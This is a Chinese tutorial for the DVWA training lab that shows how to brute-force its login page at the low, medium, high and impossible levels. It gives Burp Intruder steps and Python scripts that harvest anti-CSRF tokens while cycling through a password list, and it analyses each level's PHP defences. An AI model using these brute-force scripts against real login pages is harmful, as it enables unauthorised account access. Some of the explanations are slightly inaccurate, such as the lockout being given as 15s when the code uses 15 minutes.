建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用

owaspbwa下载地址: OWASP Broken Web Applications Project download | SourceForge.net

注:owaspbwa的本机用户名root密码owaspbwa,记得看看靶机的ip方便以后使用。dvwa的用户名和密码都为admin(owaspbwa中的dvwa是此,其他的用户名为admin密码为password)

暴力破解原理

利用抓包软件抓包,来不断对单个用户名穷举密码的操作

注:密码本和用户名本里面应当有所谓的用户名和密码

Brute Force(Security Level: low)

漏洞利用

打开burp对此网站抓包,用户和密码就是随便输入,只是为了抓包

将此数据包发送到intruder模块

这里会有几个标出来的字段,直接选择clear,选中需要爆破是username和password的值利用add添加(也可以直接爆破密码)(前提是要知道用户名建议直接admin)

选中paysloads模块,进行设置,直接在payload options选择load去添加字典,或者用add添加单个字段

点击右上角的start attack就行,等待一下就可以

通过status和length筛选可以看到密码

代码分析

if( isset( $_GET[ 'Login' ] ) ) {

// Get username

$user = $_GET[ 'username' ];

// Get password

$pass = $_GET[ 'password' ];

$pass = md5( $pass );

// Check the database

$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '

' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );

if( $result && mysqli_num_rows( $result ) == 1 ) {

// Get users details

$row = mysqli_fetch_assoc( $result );

$avatar = $row["avatar"];

// Login successful

echo "

Welcome to the password protected area {$user}

";

echo "安全 web安全 网络安全 php dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析) 第1张";

}

else {

// Login failed

echo "


Username and/or password incorrect.
";

}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

?>

就是一个只实现了登入的代码,只是对密码进行md5加密,防止我们通过密码进行SQL注入(可以使用username进行SQL注入),可没有对帐号的登入尝试次数做限制。

Brute Force(Security Level: medium)

漏洞利用

与上一难度一样,但是需要设置时停

修改burp的resource pool模块(本模块是修改攻击速度)

按此配置就行,可以试试能不能更快爆破,只要大于网站要求请求时间就可

结果与上面一样(爆破会很慢的,就不放出来了)

代码分析

if( isset( $_GET[ 'Login' ] ) ) {

// Sanitise username input

$user = $_GET[ 'username' ];

$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Sanitise password input

$pass = $_GET[ 'password' ];

$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

$pass = md5( $pass );

// Check the database

$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '

' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );

if( $result && mysqli_num_rows( $result ) == 1 ) {

// Get users details

$row = mysqli_fetch_assoc( $result );

$avatar = $row["avatar"];

// Login successful

echo "

Welcome to the password protected area {$user}

";

echo "安全 web安全 网络安全 php dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析) 第1张";

}

else {

// Login failed

sleep( 2 );

echo "


Username and/or password incorrect.
";

}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

?>

这边的代码加上了一个,延迟两秒才能下一个,所以延长了爆破时间,怎加的是时间成本。

mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义,基本可以抵抗SQL注入

Brute Force(Security Level: high)

漏洞利用

建议看看token是否正常,建议用Linux

burp抓包

前面一样,修改options下的grep-extract和

找到token

先修改值,在单击refetch response

将payloads下的payload set 改为2

就可以攻击了

python脚本

python2.x脚本

from bs4 import BeautifulSoup

import urllib2

header={'Host':'127.0.0.1',

'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Referer':'http://127.0.0.1/vulnerabilities/brute/',

'cookie':'PHPSESSID=6oqhn9tsrs80rbf3h4cvjutnn6; security=high',

'Connection':'close',

'Upgrade-Insecure-Requests':'1'

}

requrl="http://127.0.0.1/vulnerabilities/brute/"

def get_token(requrl,header):

req=urllib2.Request(url=requrl,headers=header)

response=urllib2.urlopen(req)

print response.getcode(),

the_page=response.read()

print len(the_page)

soup=BeautifulSoup(the_page,"html.parser") #将返回的html页面解析为一个BeautifulSoup对象

input=soup.form.select("input[type='hidden']") #返回的是一个list列表

user_token=input[0]['value'] #获取用户的token

return user_token

user_token=get_token(requrl,header)

i=0

for line in open("E:\Password\mima.txt"):

requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token

i=i+1

print i , 'admin' ,line.strip(),

user_token=get_token(requrl,header)

if(i==20):

break

python3.x

from bs4 import BeautifulSoup

import requests

header={'Host':'127.0.0.1',

'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',

'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Referer':'http://127.0.0.1/vulnerabilities/brute/',

'cookie':'PHPSESSID=8p4kb7jc1df431lo6qe249quv2; security=high',

'Connection':'close',

'Upgrade-Insecure-Requests':'1'

}

requrl="http://127.0.0.1/vulnerabilities/brute/"

def get_token(requrl,header):

response=requests.get(url=requrl,headers=header)

print (response.status_code,len(response.content))

soup=BeautifulSoup(response.text,"html.parser")

input=soup.form.select("input[type='hidden']") #返回的是一个list列表

user_token=input[0]['value'] #获取用户的token

return user_token

user_token=get_token(requrl,header)

i=0

for line in open("E:\Password\mima.txt"):

requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token

i=i+1

print (i , 'admin' ,line.strip(),end=" ")

user_token=get_token(requrl,header)

if(i==20):

break

这个是参考的(2条消息) DVWA之Brute Force(暴力破解)_谢公子的博客-CSDN博客_dvwa brute force

这个自己跑下吧

代码分析

if( isset( $_GET[ 'Login' ] ) ) {

// Check Anti-CSRF token

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// Sanitise username input

$user = $_GET[ 'username' ];

$user = stripslashes( $user );

$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Sanitise password input

$pass = $_GET[ 'password' ];

$pass = stripslashes( $pass );

$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

$pass = md5( $pass );

// Check database

$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '

' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
' );

if( $result && mysqli_num_rows( $result ) == 1 ) {

// Get users details

$row = mysqli_fetch_assoc( $result );

$avatar = $row["avatar"];

// Login successful

echo "

Welcome to the password protected area {$user}

";

echo "安全 web安全 网络安全 php dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析) 第1张";

}

else {

// Login failed

sleep( rand( 0, 3 ) );

echo "


Username and/or password incorrect.
";

}

((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

// Generate Anti-CSRF token

generateSessionToken();

?>

前面的防护基础上加上了Anti-CSRF token来抵御CSRF的攻击,使用了stripslashes函数和mysqli_real_esacpe_string来抵御SQL注入和XSS的攻击。由于使用了Anti-CSRF token,每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

Brute Force(Security Level: impossible)

代码分析

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {

// Check Anti-CSRF token

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// Sanitise username input

$user = $_POST[ 'username' ];

$user = stripslashes( $user );

$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

// Sanitise password input

$pass = $_POST[ 'password' ];

$pass = stripslashes( $pass );

$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

$pass = md5( $pass );

// Default values

$total_failed_login = 3;

$lockout_time = 15;

$account_locked = false;

// Check the database (Check user information)

$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );

$data->bindParam( ':user', $user, PDO::PARAM_STR );

$data->execute();

$row = $data->fetch();

// Check to see if the user has been locked out.

if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {

// User locked out. Note, using this method would allow for user enumeration!

//echo "


This account has been locked due to too many incorrect logins.
";

// Calculate when the user would be allowed to login again

$last_login = strtotime( $row[ 'last_login' ] );

$timeout = $last_login + ($lockout_time * 60);

$timenow = time();

/*

print "The last login was: " . date ("h:i:s", $last_login) . "
";

print "The timenow is: " . date ("h:i:s", $timenow) . "
";

print "The timeout is: " . date ("h:i:s", $timeout) . "
";

*/

// Check to see if enough time has passed, if it hasn't locked the account

if( $timenow < $timeout ) {

$account_locked = true;

// print "The account is locked
";

}

}

// Check the database (if username matches the password)

$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );

$data->bindParam( ':user', $user, PDO::PARAM_STR);

$data->bindParam( ':password', $pass, PDO::PARAM_STR );

$data->execute();

$row = $data->fetch();

// If its a valid login...

if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {

// Get users details

$avatar = $row[ 'avatar' ];

$failed_login = $row[ 'failed_login' ];

$last_login = $row[ 'last_login' ];

// Login successful

echo "

Welcome to the password protected area {$user}

";

echo "安全 web安全 网络安全 php dvwa靶场Brute Force(暴力破解)全难度教程(附代码分析) 第1张";

// Had the account been locked out since last login?

if( $failed_login >= $total_failed_login ) {

echo "

Warning: Someone might of been brute forcing your account.

";

echo "

Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.

";

}

// Reset bad login count

$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );

$data->bindParam( ':user', $user, PDO::PARAM_STR );

$data->execute();

} else {

// Login failed

sleep( rand( 2, 4 ) );

// Give the user some feedback

echo "


Username and/or password incorrect.

Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
";

// Update bad login count

$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );

$data->bindParam( ':user', $user, PDO::PARAM_STR );

$data->execute();

}

// Set the last login time

$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );

$data->bindParam( ':user', $user, PDO::PARAM_STR );

$data->execute();

}

// Generate Anti-CSRF token

generateSessionToken();

?>

在上一难度的基础上对用户的操作做了限制,当登入失败3此后,账号会锁住15s,同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这里因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。

查看原文